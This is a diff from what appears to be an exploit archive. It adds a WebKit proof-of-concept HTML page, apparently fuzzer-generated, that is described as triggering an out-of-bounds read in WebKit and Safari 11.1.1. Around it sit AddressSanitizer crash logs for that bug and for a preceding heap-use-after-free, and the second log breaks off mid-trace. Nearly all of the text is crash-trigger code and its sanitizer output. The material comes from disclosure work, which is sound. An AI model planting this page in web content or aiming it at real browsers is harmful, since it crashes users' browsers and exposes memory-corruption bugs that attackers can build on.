+    #70 0x1174585a5 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ec05a5)
+    #71 0x117468e04 in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ed0e04)
+    #72 0x1169f165f in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x245965f)
+    #73 0x1169ea580 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2452580)
+    #74 0x1172e2367 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d4a367)
+    #75 0x1173e069d in WebCore::CachedResourceLoader::loadDone(WebCore::LoadCompletionType, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e4869d)
+    #76 0x117369391 in WebCore::SubresourceLoader::notifyDone(WebCore::LoadCompletionType) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dd1391)
+    #77 0x1173661c8 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dce1c8)
+    #78 0x10f06687b in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdfc87b)
+    #79 0x10f06ae06 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe00e06)
+    #80 0x10f06a0fe in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe000fe)
+    #81 0x10e64bea8 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3e1ea8)
+    #82 0x10e3beb7e in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x154b7e)
+    #83 0x10e3c001e in IPC::Connection::dispatchIncomingMessages() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x15601e)
+    #84 0x123f7d3c7 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8f3c7)
+    #85 0x123f7de46 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8fe46)
+    #86 0x7fff54e22a60 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa3a60)
+    #87 0x7fff54edc47b in __CFRunLoopDoSource0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x15d47b)
+    #88 0x7fff54e054bf in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x864bf)
+    #89 0x7fff54e0493c in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8593c)
+    #90 0x7fff54e041a2 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x851a2)
+    #91 0x7fff540ead95 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fd95)
+    #92 0x7fff540eab05 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fb05)
+    #93 0x7fff540ea883 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2f883)
+    #94 0x7fff5239ca72 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x41a72)
+    #95 0x7fff52b32e33 in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7d7e33)
+    #96 0x7fff52391884 in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x36884)
+    #97 0x7fff52360a71 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5a71)
+    #98 0x7fff7cf6cdc6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x10dc6)
+    #99 0x7fff7cf6ba19 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xfa19)
+    #100 0x10e2604c6 in main (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x1000014c6)
+    #101 0x7fff7cc12014 in start (/usr/lib/system/libdyld.dylib:x86_64+0x1014)
+
+0x60800006aa34 is located 20 bytes inside of 96-byte region [0x60800006aa20,0x60800006aa80)
+freed by thread T0 here:
+    #0 0x11240dfa4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59fa4)
+    #1 0x123ff08e1 in bmalloc::IsoTLS::debugFree(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1028e1)
+    #2 0x116e58c6b in void bmalloc::IsoTLS::deallocateSlow<bmalloc::IsoConfig<96u>, WebCore::HTMLHeadElement>(bmalloc::api::IsoHeap<WebCore::HTMLHeadElement>&, void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28c0c6b)
+    #3 0x1264c15a5 in void JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::JSDestructibleObjectDestroyFunc>(JSC::FreeList*, JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::JSDestructibleObjectDestroyFunc const&)::'lambda'(void*)::operator()(void*) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x25d35a5)
+    #4 0x1264c165a in void JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::JSDestructibleObjectDestroyFunc>(JSC::FreeList*, JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::JSDestructibleObjectDestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x25d365a)
+    #5 0x1264bec8b in void JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::JSDestructibleObjectDestroyFunc>(JSC::FreeList*, JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::JSDestructibleObjectDestroyFunc const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x25d0c8b)
+    #6 0x1264b858a in void JSC::MarkedBlock::Handle::finishSweepKnowingHeapCellType<JSC::JSDestructibleObjectDestroyFunc>(JSC::FreeList*, JSC::JSDestructibleObjectDestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x25ca58a)
+    #7 0x12646e12e in void JSC::MarkedBlock::Handle::finishSweepKnowingHeapCellType<JSC::JSDestructibleObjectDestroyFunc>(JSC::FreeList*, JSC::JSDestructibleObjectDestroyFunc const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x258012e)
+    #8 0x12646dd37 in JSC::JSDestructibleObjectHeapCellType::finishSweep(JSC::MarkedBlock::Handle&, JSC::FreeList*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x257fd37)
+    #9 0x125bd9df9 in JSC::MarkedBlock::Handle::sweep(JSC::FreeList*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cebdf9)
+    #10 0x125bcfada in JSC::LocalAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1ce1ada)
+    #11 0x125bcf796 in JSC::LocalAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1ce1796)
+    #12 0x125bcf1f0 in JSC::LocalAllocator::allocateSlowCase(JSC::GCDeferralContext*, JSC::AllocationFailureMode) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1ce11f0)
+    #13 0x11649b246 in void* JSC::allocateCell<WebCore::JSHTMLDocument>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f03246)
+    #14 0x11649ac29 in WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument, WTF::DumbPtrTraits<WebCore::HTMLDocument> >&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f02c29)
+    #15 0x11649ab6b in std::__1::enable_if<std::is_same<WebCore::HTMLDocument, WebCore::HTMLDocument>::value, WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::HTMLDocument>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument, WTF::DumbPtrTraits<WebCore::HTMLDocument> >&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f02b6b)
+    #16 0x1164a91b1 in WebCore::toJSNewlyCreated(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument, WTF::DumbPtrTraits<WebCore::HTMLDocument> >&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f111b1)
+    #17 0x114ae5915 in WebCore::jsDOMImplementationPrototypeFunctionCreateHTMLDocumentBody(JSC::ExecState*, WebCore::JSDOMImplementation*, JSC::ThrowScope&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x54d915)
+    #18 0x114ab7ef7 in long long WebCore::IDLOperation<WebCore::JSDOMImplementation>::call<&(WebCore::jsDOMImplementationPrototypeFunctionCreateHTMLDocumentBody(JSC::ExecState*, WebCore::JSDOMImplementation*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x51fef7)
+    #19 0x17ac3cce176  (<unknown module>)
+    #20 0x123fffd08 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x111d08)
+    #21 0x123fffd08 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x111d08)
+    #22 0x123fffd08 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x111d08)
+    #23 0x123ff933a in vmEntryToJavaScript (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x10b33a)
+    #24 0x125d68964 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1e7a964)
+    #25 0x12633a5b9 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244c5b9)
+    #26 0x12633a74b in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244c74b)
+    #27 0x12633aaf1 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244caf1)
+    #28 0x1164446b8 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1eac6b8)
+    #29 0x116492b9c in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1efab9c)
+
+previously allocated by thread T0 here:
+    #0 0x11240da3c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59a3c)
+    #1 0x7fff7cdbb1bc in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x21bc)
+    #2 0x123fdca84 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xeea84)
+    #3 0x123ff07dc in bmalloc::IsoTLS::debugMalloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1027dc)
+    #4 0x116e58869 in void* bmalloc::IsoTLS::allocateSlow<bmalloc::IsoConfig<96u>, WebCore::HTMLHeadElement>(bmalloc::api::IsoHeap<WebCore::HTMLHeadElement>&, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28c0869)
+    #5 0x116e420fd in WebCore::HTMLHeadElement::create(WebCore::QualifiedName const&, WebCore::Document&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28aa0fd)
+    #6 0x11483bd98 in WebCore::headConstructor(WebCore::QualifiedName const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a3d98)
+    #7 0x11483209f in WebCore::HTMLElementFactory::createKnownElement(WTF::AtomicString const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x29a09f)
+    #8 0x117031c58 in WebCore::HTMLConstructionSite::createHTMLElementOrFindCustomElementInterface(WebCore::AtomicHTMLToken&, WebCore::JSCustomElementInterface**) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a99c58)
+    #9 0x117030c8c in WebCore::HTMLConstructionSite::createHTMLElement(WebCore::AtomicHTMLToken&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a98c8c)
+    #10 0x117030a4a in WebCore::HTMLConstructionSite::insertHTMLHeadElement(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a98a4a)
+    #11 0x11707f443 in WebCore::HTMLTreeBuilder::processStartTag(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ae7443)
+    #12 0x117087130 in WebCore::HTMLTreeBuilder::defaultForBeforeHead() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2aef130)
+    #13 0x11707fb32 in WebCore::HTMLTreeBuilder::processStartTag(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ae7b32)
+    #14 0x11707dcee in WebCore::HTMLTreeBuilder::constructTree(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ae5cee)
+    #15 0x1170375cc in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a9f5cc)
+    #16 0x11703715a in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a9f15a)
+    #17 0x117036364 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a9e364)
+    #18 0x117037ed7 in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl, WTF::DumbPtrTraits<WTF::StringImpl> >&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a9fed7)
+    #19 0x1169d09e3 in WebCore::DecodedDataDocumentParser::appendBytes(WebCore::DocumentWriter&, char const*, unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x24389e3)
+    #20 0x117291494 in WebCore::DocumentLoader::commitData(char const*, unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2cf9494)
+    #21 0x10ebf981a in WebKit::WebFrameLoaderClient::committedLoad(WebCore::DocumentLoader*, char const*, int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x98f81a)
+    #22 0x1172980c3 in WebCore::DocumentLoader::commitLoad(char const*, int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d000c3)
+    #23 0x1173ce7af in WebCore::CachedRawResource::notifyClientsDataWasReceived(char const*, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e367af)
+    #24 0x1173ce4da in WebCore::CachedRawResource::updateBuffer(WebCore::SharedBuffer&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e364da)
+    #25 0x117368173 in WebCore::SubresourceLoader::didReceiveDataOrBuffer(char const*, int, WTF::RefPtr<WebCore::SharedBuffer, WTF::DumbPtrTraits<WebCore::SharedBuffer> >&&, long long, WebCore::DataPayloadType) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dd0173)
+    #26 0x117367e6b in WebCore::SubresourceLoader::didReceiveData(char const*, unsigned int, long long, WebCore::DataPayloadType) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dcfe6b)
+    #27 0x10f06611e in WebKit::WebResourceLoader::didReceiveData(IPC::DataReference const&, long long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdfc11e)
+    #28 0x10f06ac60 in void IPC::handleMessage<Messages::WebResourceLoader::DidReceiveData, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(IPC::DataReference const&, long long)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(IPC::DataReference const&, long long)) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe00c60)
+    #29 0x10f06a01f in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe0001f)
+
+SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb8619) in WebCore::Node::getFlag(WebCore::Node::NodeFlags) const
+Shadow bytes around the buggy address:
+  0x1c100000d4f0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
+  0x1c100000d500: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
+  0x1c100000d510: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
+  0x1c100000d520: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
+  0x1c100000d530: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x1c100000d540: fa fa fa fa fd fd[fd]fd fd fd fd fd fd fd fd fd
+  0x1c100000d550: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c100000d560: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c100000d570: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
+  0x1c100000d580: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
+  0x1c100000d590: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==69151==ABORTING
+
+
+WebKit bug tracker link: https://bugs.webkit.org/show_bug.cgi?id=186917
+Apple product security report ID: 693711851
+-->
\ No newline at end of file
diff --git a/exploits/multiple/dos/45483.html b/exploits/multiple/dos/45483.html
new file mode 100644
index 000000000..6007ad343
--- /dev/null
+++ b/exploits/multiple/dos/45483.html
@@ -0,0 +1,179 @@
+<!--
+There is a out-of-bounds read security vulnerability in WebKit. The vulnerability was confirmed on the ASan build of WebKit revision 233419 on OSX. The vulnerability has also been confirmed on Safari 11.1.1 sources grabbed from https://svn.webkit.org/repository/webkit/releases/Apple/Safari%2011.1.1/
+
+PoC:
+
+=================================================================
+-->
+
+<style>
+* { -webkit-logical-width: 1px; -webkit-perspective: 1px;  }
+</style>
+<script>
+function jsfuzzer() {
+  var htmlvar00011 = document.getElementById("htmlvar00011");
+  var htmlvar00019 = document.getElementById("htmlvar00019");
+  var htmlvar00049 = document.getElementById("htmlvar00049");
+  var htmlvar00005 = document.getElementById("htmlvar00005");
+  document.documentElement.appendChild(htmlvar00019);
+  htmlvar00004.insertAdjacentHTML("beforeBegin",'<optgroup id="htmlvar00005"><option>1</option></optgroup>');
+  htmlvar00004.options.add(htmlvar00023);
+  htmlvar00011.appendChild(htmlvar00044);
+  document.body.insertAdjacentHTML("beforeBegin",'<track id="htmlvar00003">aaaaaaaa<select><textarea></textarea>');
+  document.execCommand("styleWithCSS", false, false);
+  document.getElementById('htmlvar00003').appendChild(htmlvar00049);
+  document.body.style.cssFloat = "right";
+  htmlvar00011.selected = true;
+}
+</script>
+<body onload=jsfuzzer()>
+<select id="htmlvar00004" dir="rtl">
+<option id="htmlvar00011">oH{I</option>
+</select>
+</body>
+<div id="htmlvar00019">
+<h3>
+<option id="htmlvar00023" selected="selected">H;<%/IXwS1S:tOT[</option>
+<div id="htmlvar00044">
+<h2>j3ci</h2>
+<textarea id="htmlvar00049">p85_0u</textarea>
+
+<!--
+=================================================================
+
+ASan log:
+
+=================================================================
+==26550==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000b5b1f at pc 0x000510042e78 bp 0x7ffeeba9d0a0 sp 0x7ffeeba9d098
+READ of size 1 at 0x6020000b5b1f thread T0
+==26550==WARNING: invalid path to external symbolizer!
+==26550==WARNING: Failed to use and restart external symbolizer!
+    #0 0x510042e77 in WTF::StringImpl::at(unsigned int) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x42e77)
+    #1 0x5135a0844 in WebCore::InlineTextBox::isLineBreak() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35a0844)
+    #2 0x5135a27a8 in WebCore::InlineTextBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x35a27a8)
+    #3 0x513598601 in WebCore::InlineFlowBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3598601)
